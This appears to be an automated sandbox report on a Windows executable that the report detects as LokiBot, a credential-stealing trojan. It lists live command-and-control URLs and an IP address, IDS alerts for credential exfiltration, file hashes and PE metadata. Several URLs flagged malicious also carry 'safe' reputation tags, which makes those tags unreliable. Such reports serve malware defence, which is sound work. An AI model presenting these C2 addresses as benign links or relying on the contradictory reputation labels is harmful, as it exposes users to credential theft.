                  https://www.ritcophysiotherapy.com.au/wap121/five/fre.php0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnFk0%Avira URL Cloudsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.ritcophysiotherapy.com.au
                  		203.170.84.89
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://kbfvzoboss.bid/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.ritcophysiotherapy.com.au/wap121/five/fre.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://alphastand.top/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://alphastand.win/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://alphastand.trade/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ritcophysiotherapy.com.au/wap121/five/fre.phptrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.comionFConan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cn/;Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cnOConan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fonts.comcConan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/bTheConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                              		high
                              http://www.ibsensoftware.com/Conan Fegan - Aluminium.exe, Conan Fegan - Aluminium.exe, 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.tiro.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.galapagosdesign.com/staff/dennis.htm-Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.goodfont.co.krConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.comaConan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssConan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.carterandcone.comlConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comConan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/Conan Fegan - Aluminium.exe, 00000000.00000003.636630818.0000000005B56000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnConan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn9Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.ascendercorp.com/typedesigners.htmlConan Fegan - Aluminium.exe, 00000000.00000003.638473832.0000000005B8D000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fonts.comConan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comaConan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.commiConan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cngConan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cnFkConan Fegan - Aluminium.exe, 00000000.00000003.636140982.0000000005B5E000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sakkal.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          203.170.84.89
                                          		unknownAustralia
                                          		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:356211
                                          Start date:22.02.2021
                                          Start time:19:12:10
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 6m 43s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:Conan Fegan - Aluminium.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@3/3@88/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 90% (good quality ratio 86.4%)
                                          • Quality average: 77%
                                          • Quality standard deviation: 28.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 66
                                          • Number of non-executed functions: 11
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 23.54.113.53, 168.61.161.212, 40.88.32.150, 51.104.139.180, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.104.144.132, 92.122.213.194, 92.122.213.247, 51.11.168.160
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356211/sample/Conan Fegan - Aluminium.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          19:12:58API Interceptor86x Sleep call for process: Conan Fegan - Aluminium.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          203.170.84.89IMG-2021-17-02557000015.gz.exeGet hashmaliciousBrowse
                                          • www.ritcophysiotherapy.com.au/wap121/five/fre.php

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.ritcophysiotherapy.com.auIMG-2021-17-02557000015.gz.exeGet hashmaliciousBrowse
                                          • 203.170.84.89

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUDHL Document. PDF.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          urgent specification request.exeGet hashmaliciousBrowse
                                          • 27.54.83.1
                                          IMG-2021-17-02557000015.gz.exeGet hashmaliciousBrowse
                                          • 203.170.84.89
                                          Purchase Enquiry.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          BELZONA Specification.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          Shipment Document-REF-INV_Pdf.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          q5oRsfy1vk.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          Client.vbsGet hashmaliciousBrowse
                                          • 203.170.80.250
                                          Copy_#_824.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Copy_#_824.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Copy_#_824.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Notification #591501.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Note #83008.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Notification #591501.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Notification #591501.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Scan 108.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Scan 108.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Scan 108.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          inv.exeGet hashmaliciousBrowse
                                          • 203.170.80.250
                                          https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                          • 103.28.48.147

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Conan Fegan - Aluminium.exe.log
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                          MD5:69206D3AF7D6EFD08F4B4726998856D3
                                          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                          C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: 1
                                          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16054
                                          Entropy (8bit):0.6032389203630698
                                          Encrypted:false
                                          SSDEEP:12:4/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/gc:s
                                          MD5:E9856AAF2BC6ABAAE1AA2CC5F0CC660D
                                          SHA1:86D357DD16FB79826BE759815CD9C0487873B899
                                          SHA-256:F48ADD5B1FBF19A72C9BC8F98DAB0EFB099E2DFC573F3996410836A8491DFE08
                                          SHA-512:FD969883E96613993D240F9E7C233734B94A7B730B6618BE15D62730F739E829554FC70156818BD42EBEC3D2E1465B5F76230459348254C15C3E67ED962AD366
                                          Malicious:false
                                          Reputation:low
                                          Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.251631180417383
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Conan Fegan - Aluminium.exe
                                          File size:398848
                                          MD5:708ee64939578fbb07010e20f6c7672c
                                          SHA1:335dc9a9142b528848b8446be2afda844f6d673f
                                          SHA256:f1a43d8b49bda3c88eb1c314c9460a92c0b467ea8db4c9086ac8e3bfe358e511
                                          SHA512:0760e722df49e3a10b26320b54648029c1d7e2862bca7f1bc4d9a60cf9a46a6d847eb3a86825ea1faa59aaa93725d601cee8c3167f4a8fe01ff4454e823fec9a
                                          SSDEEP:6144:cHxKPS22Xs/zVtvkuv4O+IpTXeUJ/K5Yd1OpGLFGY1bON94r:cfXs/vV+IFLiA4Q4Y1bDr
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.3`..............P..............*... ...@....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x462ae6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x6033CE41 [Mon Feb 22 15:31:13 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x62a940x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x5e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x60aec0x60c00False0.710743196867data7.26782540442IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0x640000x5e00x600False0.431640625data4.16085866295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x660000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x640900x350data
                                          RT_MANIFEST0x643f00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright Microsoft 2014
                                          Assembly Version1.0.0.0
                                          InternalNameCallConvCdecl.exe
                                          FileVersion1.0.0.0
                                          CompanyNameMicrosoft
                                          LegalTrademarks
                                          Comments
                                          ProductNameWinClient
                                          ProductVersion1.0.0.0
                                          FileDescriptionWinClient
                                          OriginalFilenameCallConvCdecl.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          02/22/21-19:13:02.072161TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974580192.168.2.4203.170.84.89
                                          02/22/21-19:13:02.072161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.4203.170.84.89
                                          02/22/21-19:13:02.072161TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.4203.170.84.89
                                          02/22/21-19:13:03.456111TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974780192.168.2.4203.170.84.89
                                          02/22/21-19:13:03.456111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.4203.170.84.89
                                          02/22/21-19:13:03.456111TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.4203.170.84.89
                                          02/22/21-19:13:04.676480TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.4203.170.84.89
                                          02/22/21-19:13:04.676480TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.4203.170.84.89
                                          02/22/21-19:13:04.676480TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.4203.170.84.89
                                          02/22/21-19:13:06.053559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.4203.170.84.89
                                          02/22/21-19:13:06.053559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.4203.170.84.89
                                          02/22/21-19:13:06.053559TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.4203.170.84.89
                                          02/22/21-19:13:07.581441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.4203.170.84.89
                                          02/22/21-19:13:07.581441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.4203.170.84.89
                                          02/22/21-19:13:07.581441TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.4203.170.84.89
                                          02/22/21-19:13:09.379899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.4203.170.84.89
